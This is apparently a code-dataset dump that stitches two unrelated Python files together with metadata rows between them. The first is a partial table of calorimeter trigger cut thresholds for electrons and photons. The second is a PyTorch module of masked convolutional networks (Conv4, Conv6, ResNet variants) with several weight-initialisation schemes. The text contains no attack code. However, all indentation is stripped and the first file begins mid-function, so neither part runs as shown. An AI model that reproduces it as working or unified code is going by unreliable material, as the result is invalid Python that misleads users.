#self.CAERATIOthr = [0.775269, 0.735433, 0.574831, 0.513675, -9999., 0.584799, 0.776095, 0.822032, -9999.]
# e12_tight
# self.HADETthr = [0.043, 0.043, 0.043, 0.043, 0.043, 0.043, 0.043, 0.043, 0.043]
# self.CARCOREthr = [0.90, 0.89, 0.89, 0.89, 0.90, 0.89, 0.89, 0.89, 0.89]
# self.CAERATIOthr = [0.60, 0.70, 0.70, 0.75, 0.85, 0.90, 0.90, 0.90, 0.90]
if(float(threshold) >= 12. and float(threshold) < 22):
self.MapsHADETthr = {
'vloose': [0.0871, 0.0617, 0.0564, 0.0827, 0.0889, 0.2052, 0.1674, 0.1481, 0.1481],
'loose': [0.08472, 0.05928, 0.054, 0.0803, 0.0829, 0.1932, 0.1590, 0.1384 , 0.1384],
'lhvloose': [0.0871, 0.0617, 0.0564, 0.0827, 0.0889, 0.2052, 0.1674, 0.1481, 0.1481],
'lhloose': [0.08472, 0.05928, 0.054, 0.0803, 0.0829, 0.1932, 0.1590, 0.1384 , 0.1384],
'medium': [0.0588, 0.0564, 0.054, 0.048, 0.06384, 0.17868, 0.1284, 0.07536, 0.07536],
'lhmedium': [0.0588, 0.0564, 0.054, 0.048, 0.06384, 0.17868, 0.1284, 0.07536, 0.07536],
'tight': [0.0588, 0.0564, 0.054, 0.048, 0.04368, 0.15612, 0.11064, 0.07536, 0.07536],
'lhtight': [0.0588, 0.0564, 0.054, 0.048, 0.04368, 0.15612, 0.11064, 0.07536, 0.07536],
'mergedtight': [0.0588, 0.0564, 0.054, 0.048, 0.04368, 0.15612, 0.11064, 0.07536, 0.07536],
}
self.MapsCARCOREthr = {
'vloose': [0.6646, 0.6590, 0.6226, 0.6539, 0.4704, 0.6536, 0.6972, 0.6817, 0.672],
'loose': [0.6806, 0.6710, 0.6306, 0.6619, 0.4704, 0.6616, 0.7012, 0.6977, 0.696],
'lhvloose': [0.6646, 0.6590, 0.6226, 0.6539, 0.4704, 0.6536, 0.6972, 0.6817, 0.672],
'lhloose': [0.6806, 0.6710, 0.6306, 0.6619, 0.4704, 0.6616, 0.7012, 0.6977, 0.696],
'medium': [0.69896, 0.68416, 0.64368, 0.68488, 0.4704, 0.6816, 0.704, 0.6992, 0.6992],
'lhmedium': [0.69896, 0.68416, 0.64368, 0.68488, 0.4704, 0.6816, 0.704, 0.6992, 0.6992],
'tight': [0.71296, 0.69344, 0.64368, 0.69064, 0.4704, 0.7036, 0.73024, 0.7164, 0.7164],
'lhtight': [0.71296, 0.69344, 0.64368, 0.69064, 0.4704, 0.7036, 0.73024, 0.7164, 0.7164],
'mergedtight': [-9999., -9999., -9999., -9999., -9999., -9999., -9999., -9999., -9999.],
}
self.MapsCAERATIOthr = {
'vloose': [0.5702, 0.6063, 0.4418, 0.4257, -9999. , 0.3408, 0.5836, 0.6800, -999],
'loose': [0.5702, 0.6063, 0.4418, 0.4257, -9999., 0.3408, 0.5836, 0.6800, -999],
'lhvloose': [0.5702, 0.6063, 0.4418, 0.4257, -9999. , 0.3408, 0.5836, 0.6800, -999],
'lhloose': [0.5702, 0.6063, 0.4418, 0.4257, -9999., 0.3408, 0.5836, 0.6800, -999],
'medium': [0.636, 0.6064, 0.5552, 0.476, -9999., 0.5536, 0.664, 0.68 , -9999.],
'lhmedium': [0.636, 0.6064, 0.5552, 0.476, -9999., 0.5536, 0.664, 0.68 , -9999.],
'tight': [0.636, 0.652, 0.5552, 0.4768, -9999., 0.6056, 0.6696, 0.7128, -9999.],
'lhtight': [0.636, 0.652, 0.5552, 0.4768, -9999., 0.6056, 0.6696, 0.7128, -9999.],
'mergedtight': [-9999., -9999., -9999., -9999., -9999., -9999., -9999., -9999., -9999.],
}
##########################
# Et 22 GeV
##########################
# e24_medium1 / e24_tight1
# AT 30-March-2012 Optimisation by Yanping:
# self.HADETthr = [0.0256693, 0.0240023, 0.0271098, 0.0206744, 0.0211902, 0.0301758, 0.0297629, 0.0295336, 0.020514]
# self.CARCOREthr = [0.882167, 0.882156, 0.857124, 0.886262, 0.724005, 0.871725, 0.902082, 0.887027, 0.744103]
# self.CAERATIOthr = [0.83009, 0.830144, 0.794944, 0.794558, -9999, 0.794933, 0.895365, 0.904011, -9999.]
# e24_loose1
# self.CAERATIOthr = [-999., -999., -999., -999., -999., -999., -999., -999., -999.]
# self.HADETthr = [0.0275625, 0.0259875, 0.0291375, 0.0228375, 0.0259875, 0.0391125, 0.0359625, 0.0370125, 0.0291375]
# self.CARCOREthr = [0.819375, 0.819375, 0.800375, 0.828875, 0.7125, 0.805125, 0.843125, 0.824125, 0.700625]
if(float(threshold) >= 22.):
self.MapsHADETthr = {
'vloose': [0.0612, 0.0588, 0.0564, 0.0504, 0.0357, 0.072, 0.0684, 0.0696, 0.0636],
'loose': [0.0588, 0.0564, 0.054, 0.048, 0.0297, 0.06, 0.06, 0.06, 0.054],
'lhvloose': [0.0612, 0.0588, 0.0564, 0.0504, 0.0357, 0.072, 0.0684, 0.0696, 0.0636],
'lhloose': [0.0588, 0.0564, 0.054, 0.048, 0.0297, 0.06, 0.06, 0.06, 0.054],
'medium': [0.0588, 0.0564, 0.054, 0.048, 0.02376, 0.06, 0.06, 0.06, 0.054],
'lhmedium': [0.0588, 0.0564, 0.054, 0.048, 0.02376, 0.06, 0.06, 0.06, 0.054],
'tight': [0.0588, 0.0564, 0.054, 0.048, 0.02376, 0.06, 0.06, 0.06, 0.054],
'lhtight': [0.0588, 0.0564, 0.054, 0.048, 0.02376, 0.06, 0.06, 0.06, 0.054],
'mergedtight': [0.0588, 0.0564, 0.054, 0.048, 0.02376, 0.06, 0.06, 0.06, 0.054],
}
self.MapsCARCOREthr = {
'vloose': [0.6912 , 0.6808 , 0.6832 , 0.6744 , 0.5976 , 0.6416, 0.692 , 0.6848 , 0.68],
'loose': [0.7112, 0.6968, 0.6952, 0.6864, 0.5976, 0.6616, 0.704 , 0.7008, 0.696],
'lhvloose': [0.6912 , 0.6808 , 0.6832 , 0.6744 , 0.5976 , 0.6416, 0.692 , 0.6848 , 0.68],
'lhloose': [0.7112, 0.6968, 0.6952, 0.6864, 0.5976, 0.6616, 0.704 , 0.7008, 0.696],
'medium': [0.716, 0.712, 0.6952, 0.692, 0.5976, 0.6816, 0.7168, 0.7128, 0.716],
'lhmedium': [0.716, 0.712, 0.6952, 0.692, 0.5976, 0.6816, 0.7168, 0.7128, 0.716],
'tight': [0.7288, 0.7296, 0.72, 0.7048, 0.6, 0.7128, 0.7312, 0.7256, 0.7192],
'lhtight': [0.7288, 0.7296, 0.72, 0.7048, 0.6, 0.7128, 0.7312, 0.7256, 0.7192],
'mergedtight': [-9999., -9999., -9999., -9999., -9999., -9999., -9999., -9999., -9999.],
}
self.MapsCAERATIOthr = {
'vloose': [-999., -999., -999., -999., -999., -999., -999., -999., -999.],
'loose': [-999., -999., -999., -999., -999., -999., -999., -999., -999.],
'lhvloose': [-999., -999., -999., -999., -999., -999., -999., -999., -999.],
'lhloose': [-999., -999., -999., -999., -999., -999., -999., -999., -999.],
'medium': [0.656, 0.66, 0.6, 0.604, -9999., 0.624, 0.664, 0.692, -9999.],
'lhmedium': [0.656, 0.66, 0.6, 0.604, -9999., 0.624, 0.664, 0.692, -9999.],
'tight': [0.72, 0.712, 0.68, 0.672, -9999., 0.68, 0.716, 0.74, -9999.],
'lhtight': [0.72, 0.712, 0.68, 0.672, -9999., 0.68, 0.716, 0.74, -9999.],
'mergedtight': [-9999., -9999., -9999., -9999., -9999., -9999., -9999., -9999., -9999.],
}
# Following is much easier, no Et dependence
# Almost no dependence on PID
class L2CaloPhotonCutMaps():
def __init__(self, threshold):
if(float(threshold) >= 0. and float(threshold) < 10):
self.MapsHADETthr = {
'loose': [0.1638, 0.1596, 0.1218, 0.1638, 0.0448875, 0.1386, 0.1596, 0.1638, 0.147],
'medium':[0.0254625, 0.0238875, 0.0270375, 0.0207375, 0.03465, 0.0378, 0.03465, 0.0286125, 0.02625],
'tight':[0.0254625, 0.0238875, 0.0270375, 0.0207375, 0.03465, 0.0378, 0.03465, 0.0286125, 0.02625],
}
self.MapsCARCOREthr = {
'loose': [0.532, 0.57, 0.646, 0.684, 0.418, 0.722, 0.684, 0.722, 0.76],
'medium':[0.83125, 0.719625, 0.814625, 0.83125, 0.703, 0.817, 0.83125, 0.8265, 0.719625],
'tight':[0.83125, 0.719625, 0.814625, 0.83125, 0.703, 0.817, 0.83125, 0.8265, 0.719625],
}
self.MapsCAERATIOthr = {
'loose': [-999., -999., -999., -999., -999., -999., -999., -999., -999.],
'medium':[-999., -999., -999., -999., -999., -999., -999., -999., -999.],
'tight':[-999., -999., -999., -999., -999., -999., -999., -999., -999.],
}
elif(float(threshold) >= 10. and float(threshold) < 15):
self.MapsHADETthr = {
'loose': [0.0359625, 0.0343875, 0.0396375, 0.0291375, 0.0501375, 0.0559125, 0.0548625, 0.0538125, 0.0469875],
'medium':[0.0359625, 0.0343875, 0.0396375, 0.0291375, 0.0501375, 0.0559125, 0.0548625, 0.0538125, 0.0469875],
'tight':[0.0359625, 0.0343875, 0.0396375, 0.0291375, 0.0501375, 0.0559125, 0.0548625, 0.0538125, 0.0469875],
}
self.MapsCARCOREthr = {
'loose': [0.786125, 0.786125, 0.767125, 0.795625, 0.703, 0.776625, 0.819375, 0.805125, 0.681625],
'medium':[0.786125, 0.786125, 0.767125, 0.795625, 0.703, 0.776625, 0.819375, 0.805125, 0.681625],
'tight':[0.786125, 0.786125, 0.767125, 0.795625, 0.703, 0.776625, 0.819375, 0.805125, 0.681625],
}
self.MapsCAERATIOthr = {
'loose': [-999., -999., -999., -999., -999., -999., -999., -999., -999.],
'medium': [-999., -999., -999., -999., -999., -999., -999., -999., -999.],
'tight': [-999., -999., -999., -999., -999., -999., -999., -999., -999.],
}
elif(float(threshold) >= 15. and float(threshold) < 20):
self.MapsHADETthr = {
'loose':[0.0328125, 0.0312375, 0.0354375, 0.0270375, 0.0459375, 0.0527625, 0.0433125, 0.0485625, 0.0396375],
'medium':[0.0328125, 0.0312375, 0.0354375, 0.0270375, 0.0459375, 0.0527625, 0.0433125, 0.0485625, 0.0396375],
'tight':[0.0328125, 0.0312375, 0.0354375, 0.0270375, 0.0459375, 0.0527625, 0.0433125, 0.0485625, 0.0396375],
}
self.MapsCARCOREthr = {
'loose':[0.809875, 0.805125, 0.786125, 0.809875, 0.703, 0.795625, 0.819375, 0.814625, 0.691125],
'medium':[0.809875, 0.805125, 0.786125, 0.809875, 0.703, 0.795625, 0.819375, 0.814625, 0.691125],
'tight':[0.809875, 0.805125, 0.786125, 0.809875, 0.703, 0.795625, 0.819375, 0.814625, 0.691125],
}
self.MapsCAERATIOthr = {
'loose': [-999., -999., -999., -999., -999., -999., -999., -999., -999.],
'medium':[-999., -999., -999., -999., -999., -999., -999., -999., -999.],
'tight':[-999., -999., -999., -999., -999., -999., -999., -999., -999.],
}
elif(float(threshold) >= 20. and float(threshold) < 30):
self.MapsHADETthr = {
'loose':[0.071, 0.062, 0.075, 0.060, 0.051, 0.057, 0.075, 0.072, 0.051],
'medium':[0.071, 0.062, 0.075, 0.060, 0.051, 0.057, 0.075, 0.072, 0.051],
'tight':[0.071, 0.062, 0.075, 0.060, 0.051, 0.057, 0.075, 0.072, 0.051],
}
self.MapsCARCOREthr = {
'loose':[0.819375, 0.819375, 0.800375, 0.828875, 0.7125, 0.805125, 0.843125, 0.824125, 0.700625],
'medium':[0.819375, 0.819375, 0.800375, 0.828875, 0.7125, 0.805125, 0.843125, 0.824125, 0.700625],
'tight':[0.819375, 0.819375, 0.800375, 0.828875, 0.7125, 0.805125, 0.843125, 0.824125, 0.700625],
}
self.MapsCAERATIOthr = {
'loose': [-999., -999., -999., -999., -999., -999., -999., -999., -999.],
'medium':[-999., -999., -999., -999., -999., -999., -999., -999., -999.],
'tight':[-999., -999., -999., -999., -999., -999., -999., -999., -999.],
}
elif(float(threshold) >= 30. and float(threshold) < 40):
self.MapsHADETthr = {
'loose':[0.071, 0.062, 0.075, 0.060, 0.051, 0.057, 0.075, 0.072, 0.051],
'medium':[0.071, 0.062, 0.075, 0.060, 0.051, 0.057, 0.075, 0.072, 0.051],
'tight':[0.071, 0.062, 0.075, 0.060, 0.051, 0.057, 0.075, 0.072, 0.051],
}
self.MapsCARCOREthr = {
'loose':[0.819375, 0.819375, 0.800375, 0.828875, 0.7125, 0.805125, 0.843125, 0.824125, 0.700625],
'medium':[0.819375, 0.819375, 0.800375, 0.828875, 0.7125, 0.805125, 0.843125, 0.824125, 0.700625],
'tight':[0.819375, 0.819375, 0.800375, 0.828875, 0.7125, 0.805125, 0.843125, 0.824125, 0.700625],
}
self.MapsCAERATIOthr = {
'loose': [-999., -999., -999., -999., -999., -999., -999., -999., -999.],
'medium':[-999., -999., -999., -999., -999., -999., -999., -999., -999.],
'tight': [-999., -999., -999., -999., -999., -999., -999., -999., -999.],
}
elif(float(threshold) >= 40.):
self.MapsHADETthr = {
'loose':[0.071, 0.062, 0.075, 0.060, 0.051, 0.057, 0.075, 0.072, 0.051],
'medium':[0.071, 0.062, 0.075, 0.060, 0.051, 0.057, 0.075, 0.072, 0.051],
'tight':[0.071, 0.062, 0.075, 0.060, 0.051, 0.057, 0.075, 0.072, 0.051],
}
self.MapsCARCOREthr = {
'loose':[0.819375, 0.819375, 0.800375, 0.828875, 0.7125, 0.805125, 0.843125, 0.824125, 0.700625],
'medium':[0.819375, 0.819375, 0.800375, 0.828875, 0.7125, 0.805125, 0.843125, 0.824125, 0.700625],
'tight':[0.819375, 0.819375, 0.800375, 0.828875, 0.7125, 0.805125, 0.843125, 0.824125, 0.700625],
}
self.MapsCAERATIOthr = {
'loose': [-999., -999., -999., -999., -999., -999., -999., -999., -999.],
'medium': [-999., -999., -999., -999., -999., -999., -999., -999., -999.],
'tight': [-999., -999., -999., -999., -999., -999., -999., -999., -999.],
}
else:
raise RuntimeError('INCORRECT threshold: No cuts configured')
| 73.193431 | 130 | 0.486662 | 3,035 | 20,055 | 3.207249 | 0.13542 | 0.113417 | 0.14886 | 0.170125 | 0.77933 | 0.77933 | 0.776659 | 0.768851 | 0.768851 | 0.757962 | 0 | 0.487795 | 0.291199 | 20,055 | 273 | 131 | 73.461538 | 0.196975 | 0.1635 | 0 | 0.35122 | 0 | 0 | 0.056169 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.009756 | false | 0 | 0 | 0 | 0.019512 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
8de48bab2a9c039bc4700792e83d4dca021b0544 | 19,293 | py | Python | models/masked_convs.py | VITA-Group/Peek-a-Boo | 9290d4e5e3aee0dff994e1a664ec91bd6ec93176 | [
"MIT"
] | 2 | 2022-01-22T03:57:21.000Z | 2022-01-30T20:44:32.000Z | models/masked_convs.py | VITA-Group/Peek-a-Boo | 9290d4e5e3aee0dff994e1a664ec91bd6ec93176 | [
"MIT"
] | null | null | null | models/masked_convs.py | VITA-Group/Peek-a-Boo | 9290d4e5e3aee0dff994e1a664ec91bd6ec93176 | [
"MIT"
] | 2 | 2022-01-30T12:26:56.000Z | 2022-03-14T12:42:06.000Z | '''ResNet in PyTorch.
For Pre-activation ResNet, see 'preact_resnet.py'.
Reference:
[1] Kaiming He, Xiangyu Zhang, Shaoqing Ren, Jian Sun
Deep Residual Learning for Image Recognition. arXiv:1512.03385
'''
from numpy.lib.arraysetops import isin
import torch
import torch.nn as nn
import torch.nn.functional as F
import math
import numpy as np
from masked_layers import layers
def conv3x3(in_planes, out_planes, stride=1, groups=1, dilation=1):
"""3x3 convolution with padding"""
return layers.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=dilation, groups=groups, bias=False, dilation=dilation)
def conv1x1(in_planes, out_planes, stride=1):
"""1x1 convolution"""
return layers.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)
class Conv4(nn.Module):
def __init__(self, num_classes=10, init_method='standard'):
super(Conv4, self).__init__()
self.convs = nn.Sequential(
conv3x3(3, 64),
nn.BatchNorm2d(64),
nn.ReLU(),
conv3x3(64, 64),
nn.BatchNorm2d(64),
nn.ReLU(),
nn.MaxPool2d((2, 2)),
conv3x3(64, 128),
nn.BatchNorm2d(128),
nn.ReLU(),
conv3x3(128, 128),
nn.BatchNorm2d(128),
nn.ReLU(),
nn.MaxPool2d((2, 2))
)
self.linear = nn.Sequential(
conv1x1(32 * 32 * 8, 256),
nn.BatchNorm2d(256),
nn.ReLU(),
conv1x1(256, 256),
nn.BatchNorm2d(256),
nn.ReLU(),
conv1x1(256, num_classes),
)
self.reset_conv_parameters(init_method)
for m in self.modules():
if isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
def reset_parameters(self, module, init_method="kaiming_uniform") -> None:
if init_method == "kaiming_constant_signed":
fan = nn.init._calculate_correct_fan(module.weight, "fan_in")
gain = nn.init.calculate_gain("relu")
std = gain / math.sqrt(fan)
with torch.no_grad():
module.weight.data = module.weight.data.sign() * std
elif init_method == "kaiming_constant_unsigned":
fan = nn.init._calculate_correct_fan(module.weight, "fan_in")
gain = nn.init.calculate_gain("relu")
std = gain / math.sqrt(fan)
with torch.no_grad():
module.weight.data = torch.ones_like(module.weight.data) * std
elif init_method == "kaiming_normal":
nn.init.kaiming_normal_(module.weight, mode="fan_in", nonlinearity="relu")
elif init_method == "kaiming_uniform":
nn.init.kaiming_uniform_(module.weight, mode="fan_in", nonlinearity="relu")
elif init_method == "kaiming_laplace":
fan = nn.init._calculate_correct_fan(module.weight, "fan_in")
gain = nn.init.calculate_gain("relu")
scale = gain / math.sqrt(2.0 * fan)
with torch.no_grad():
new_weight = np.random.laplace(loc=0.0, scale=scale, size=module.weight.shape)
module.weight.data = module.weight.data.new_tensor(torch.from_numpy(new_weight).clone().detach())
elif init_method == "xavier_normal":
nn.init.xavier_normal_(module.weight)
elif init_method == "xavier_constant":
fan_in, fan_out = nn.init._calculate_fan_in_and_fan_out(module.weight)
std = math.sqrt(2.0 / float(fan_in + fan_out))
with torch.no_grad():
module.weight.data = module.weight.data.sign() * std
elif init_method == "standard":
nn.init.kaiming_uniform_(module.weight, a=math.sqrt(5))
else:
raise ValueError(f"{init_method} is not an initialization option!")
def reset_conv_parameters(self, init_method="standard") -> None:
for m in self.modules():
if isinstance(m, nn.Conv2d):
self.reset_parameters(m, init_method)
def get_bop_params(self):
bop_params = []
for m in self.modules():
if isinstance(m, nn.Conv2d):
bop_params += list(m.parameters())
return bop_params
def get_bop_param_masks(self):
bop_param_masks = []
for m in self.modules():
if isinstance(m, layers.Conv2d):
bop_param_masks.append(m.weight_mask)
return bop_param_masks
def get_non_bop_params(self):
non_bop_params = []
for m in self.modules():
if isinstance(m, (nn.Linear, nn.BatchNorm2d,)):
non_bop_params += list(m.parameters())
return non_bop_params
def forward(self, x):
out = self.convs(x)
out = out.view(out.size(0), 8192, 1, 1)
out = self.linear(out)
return out.squeeze()
class Conv6(nn.Module):
def __init__(self, num_classes=10, init_method='standard'):
super(Conv6, self).__init__()
self.convs = nn.Sequential(
conv3x3(3, 64),
nn.BatchNorm2d(64),
nn.ReLU(),
conv3x3(64, 64),
nn.BatchNorm2d(64),
nn.ReLU(),
nn.MaxPool2d((2, 2)),
conv3x3(64, 128),
nn.BatchNorm2d(128),
nn.ReLU(),
conv3x3(128, 128),
nn.BatchNorm2d(128),
nn.ReLU(),
nn.MaxPool2d((2, 2)),
conv3x3(128, 256),
nn.BatchNorm2d(256),
nn.ReLU(),
conv3x3(256, 256),
nn.BatchNorm2d(256),
nn.ReLU(),
nn.MaxPool2d((2, 2))
)
self.linear = nn.Sequential(
conv1x1(256 * 4 * 4, 256),
nn.BatchNorm2d(256),
nn.ReLU(),
conv1x1(256, 256),
nn.BatchNorm2d(256),
nn.ReLU(),
conv1x1(256, num_classes),
)
self.reset_conv_parameters(init_method)
for m in self.modules():
if isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
def reset_parameters(self, module, init_method="kaiming_uniform") -> None:
if init_method == "kaiming_constant_signed":
fan = nn.init._calculate_correct_fan(module.weight, "fan_in")
gain = nn.init.calculate_gain("relu")
std = gain / math.sqrt(fan)
with torch.no_grad():
module.weight.data = module.weight.data.sign() * std
elif init_method == "kaiming_constant_unsigned":
fan = nn.init._calculate_correct_fan(module.weight, "fan_in")
gain = nn.init.calculate_gain("relu")
std = gain / math.sqrt(fan)
with torch.no_grad():
module.weight.data = torch.ones_like(module.weight.data) * std
elif init_method == "kaiming_normal":
nn.init.kaiming_normal_(module.weight, mode="fan_in", nonlinearity="relu")
elif init_method == "kaiming_uniform":
nn.init.kaiming_uniform_(module.weight, mode="fan_in", nonlinearity="relu")
elif init_method == "kaiming_laplace":
fan = nn.init._calculate_correct_fan(module.weight, "fan_in")
gain = nn.init.calculate_gain("relu")
scale = gain / math.sqrt(2.0 * fan)
with torch.no_grad():
new_weight = np.random.laplace(loc=0.0, scale=scale, size=module.weight.shape)
module.weight.data = module.weight.data.new_tensor(torch.from_numpy(new_weight).clone().detach())
elif init_method == "xavier_normal":
nn.init.xavier_normal_(module.weight)
elif init_method == "xavier_constant":
fan_in, fan_out = nn.init._calculate_fan_in_and_fan_out(module.weight)
std = math.sqrt(2.0 / float(fan_in + fan_out))
with torch.no_grad():
module.weight.data = module.weight.data.sign() * std
elif init_method == "standard":
nn.init.kaiming_uniform_(module.weight, a=math.sqrt(5))
else:
raise ValueError(f"{init_method} is not an initialization option!")
def reset_conv_parameters(self, init_method="standard") -> None:
for m in self.modules():
if isinstance(m, nn.Conv2d):
self.reset_parameters(m, init_method)
def get_bop_params(self):
bop_params = []
for m in self.modules():
if isinstance(m, nn.Conv2d):
bop_params += list(m.parameters())
return bop_params
def get_bop_param_masks(self):
bop_param_masks = []
for m in self.modules():
if isinstance(m, layers.Conv2d):
bop_param_masks.append(m.weight_mask)
return bop_param_masks
def get_non_bop_params(self):
non_bop_params = []
for m in self.modules():
if isinstance(m, (nn.Linear, nn.BatchNorm2d,)):
non_bop_params += list(m.parameters())
return non_bop_params
def forward(self, x):
out = self.convs(x)
out = out.view(out.size(0), 256 * 4 * 4, 1, 1)
out = self.linear(out)
return out.squeeze()
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, in_planes, planes, stride=1):
super(BasicBlock, self).__init__()
# self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
self.conv1 = conv3x3(in_planes, planes, stride=stride) #, padding=1)
self.bn1 = nn.BatchNorm2d(planes)
# self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=1, padding=1, bias=False)
self.conv2 = conv3x3(planes, planes, stride=1) #, padding=1)
self.bn2 = nn.BatchNorm2d(planes)
self.shortcut = nn.Sequential()
if stride != 1 or in_planes != self.expansion*planes:
self.shortcut = nn.Sequential(
# nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False),
conv1x1(in_planes, self.expansion*planes, stride=stride),
nn.BatchNorm2d(self.expansion*planes)
)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.bn2(self.conv2(out))
out += self.shortcut(x)
out = F.relu(out)
return out
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, in_planes, planes, stride=1):
super(Bottleneck, self).__init__()
# self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False)
self.conv1 = conv1x1(in_planes, planes)
self.bn1 = nn.BatchNorm2d(planes)
# self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
self.conv2 = conv3x3(planes, planes, stride=stride) #, padding=1)
self.bn2 = nn.BatchNorm2d(planes)
# self.conv3 = nn.Conv2d(planes, self.expansion*planes, kernel_size=1, bias=False)
self.conv3 = conv1x1(planes, self.expansion*planes)
self.bn3 = nn.BatchNorm2d(self.expansion*planes)
self.shortcut = nn.Sequential()
if stride != 1 or in_planes != self.expansion*planes:
self.shortcut = nn.Sequential(
# nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False),
conv1x1(in_planes, self.expansion*planes, stride=stride),
nn.BatchNorm2d(self.expansion*planes)
)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = F.relu(self.bn2(self.conv2(out)))
out = self.bn3(self.conv3(out))
out += self.shortcut(x)
out = F.relu(out)
return out
class ResNet(nn.Module):
# def __init__(self, block, num_blocks, num_classes=10, init_method='standard'):
def __init__(self, block, num_blocks, in_planes=64, num_classes=10, init_method='standard'):
super(ResNet, self).__init__()
self.in_planes = in_planes
# self.conv1 = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1, bias=False)
self.conv1 = conv3x3(3, self.in_planes, stride=1) #, padding=1)
self.bn1 = nn.BatchNorm2d(self.in_planes)
if self.in_planes == 64:
# self.conv1 = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1, bias=False)
self.layer1 = self._make_layer(block, 64, num_blocks[0], stride=1)
self.layer2 = self._make_layer(block, 128, num_blocks[1], stride=2)
self.layer3 = self._make_layer(block, 256, num_blocks[2], stride=2)
self.layer4 = self._make_layer(block, 512, num_blocks[3], stride=2)
self.linear = nn.Linear(512*block.expansion, num_classes)
#self.linear = layers.Linear(512*block.expansion, num_classes)
elif self.in_planes == 16:
self.layer1 = self._make_layer(block, 16, num_blocks[0], stride=1)
self.layer2 = self._make_layer(block, 32, num_blocks[1], stride=2)
self.layer3 = self._make_layer(block, 64, num_blocks[2], stride=2)
self.layer4 = None
self.linear = nn.Linear(64, num_classes)
#self.linear = layers.Linear(64, num_classes)
self.reset_conv_parameters(init_method)
self.init_linear = torch.clone(self.linear.weight.data).detach()
#self.init_conv_signs = [m.weight.data.sign() if isinstance(m, nn.Conv2d) for m in self.modules]
def reset_linear(self) -> None:
self.linear.weight.data.copy_(self.init_linear)
def reset_parameters(self, module, init_method="kaiming_uniform") -> None:
if init_method == "kaiming_constant_signed":
fan = nn.init._calculate_correct_fan(module.weight, "fan_in")
gain = nn.init.calculate_gain("relu")
std = gain / math.sqrt(fan)
with torch.no_grad():
module.weight.data = module.weight.data.sign() * std
elif init_method == "kaiming_constant_unsigned":
fan = nn.init._calculate_correct_fan(module.weight, "fan_in")
gain = nn.init.calculate_gain("relu")
std = gain / math.sqrt(fan)
with torch.no_grad():
module.weight.data = torch.ones_like(module.weight.data) * std
elif init_method == "kaiming_normal":
nn.init.kaiming_normal_(module.weight, mode="fan_in", nonlinearity="relu")
elif init_method == "kaiming_uniform":
nn.init.kaiming_uniform_(module.weight, mode="fan_in", nonlinearity="relu")
elif init_method == "kaiming_laplace":
fan = nn.init._calculate_correct_fan(module.weight, "fan_in")
gain = nn.init.calculate_gain("relu")
scale = gain / math.sqrt(2.0 * fan)
with torch.no_grad():
new_weight = np.random.laplace(loc=0.0, scale=scale, size=module.weight.shape)
module.weight.data = module.weight.data.new_tensor(torch.from_numpy(new_weight).clone().detach())
elif init_method == "xavier_normal":
nn.init.xavier_normal_(module.weight)
elif init_method == "xavier_constant":
fan_in, fan_out = nn.init._calculate_fan_in_and_fan_out(module.weight)
std = math.sqrt(2.0 / float(fan_in + fan_out))
with torch.no_grad():
module.weight.data = module.weight.data.sign() * std
elif init_method == "standard":
nn.init.kaiming_uniform_(module.weight, a=math.sqrt(5))
else:
raise ValueError(f"{init_method} is not an initialization option!")
def reset_conv_parameters(self, init_method="standard") -> None:
for m in self.modules():
if isinstance(m, nn.Conv2d):
self.reset_parameters(m, init_method)
def get_bop_params(self):
bop_params = []
for m in self.modules():
if isinstance(m, nn.Conv2d):
bop_params += list(m.parameters())
return bop_params
def get_bop_param_masks(self):
bop_param_masks = []
for m in self.modules():
if isinstance(m, layers.Conv2d):
bop_param_masks.append(m.weight_mask)
return bop_param_masks
def get_non_bop_params(self):
non_bop_params = []
for m in self.modules():
if isinstance(m, (nn.Linear, nn.BatchNorm2d,)):
non_bop_params += list(m.parameters())
return non_bop_params
def _make_layer(self, block, planes, num_blocks, stride):
strides = [stride] + [1]*(num_blocks-1)
layers = []
for stride in strides:
layers.append(block(self.in_planes, planes, stride))
self.in_planes = planes * block.expansion
return nn.Sequential(*layers)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.layer1(out)
out = self.layer2(out)
out = self.layer3(out)
if self.layer4 is not None:
out = self.layer4(out)
# out = F.avg_pool2d(out, 4)
out = F.avg_pool2d(out, out.size()[3])
out = out.view(out.size(0), -1)
out = self.linear(out)
return out
def ResNet20(num_classes=10, init_method='standard'):
return ResNet(BasicBlock, [3,3,3], in_planes=16, num_classes=num_classes, init_method=init_method)
def ResNet110(num_classes=10, init_method='standard'):
return ResNet(BasicBlock, [18,18,18], in_planes=16, num_classes=num_classes, init_method=init_method)
def ResNet18(num_classes=10, init_method='standard'):
return ResNet(BasicBlock, [2,2,2,2], num_classes=num_classes, init_method=init_method)
# def ResNet34(input_shape, num_classes, dense_classifier, pretrained, init_method='standard'):
def ResNet34(num_classes=10, init_method='standard'):
return ResNet(BasicBlock, [3,4,6,3], num_classes=num_classes, init_method=init_method)
# def ResNet50(input_shape, num_classes, dense_classifier, pretrained, init_method='standard'):
# return ResNet(Bottleneck, [3,4,6,3], num_classes=num_classes,
# init_method=init_method)
def ResNet50(num_classes=10, init_method='standard'):
return ResNet(Bottleneck, [3,4,6,3], num_classes=num_classes, init_method=init_method)
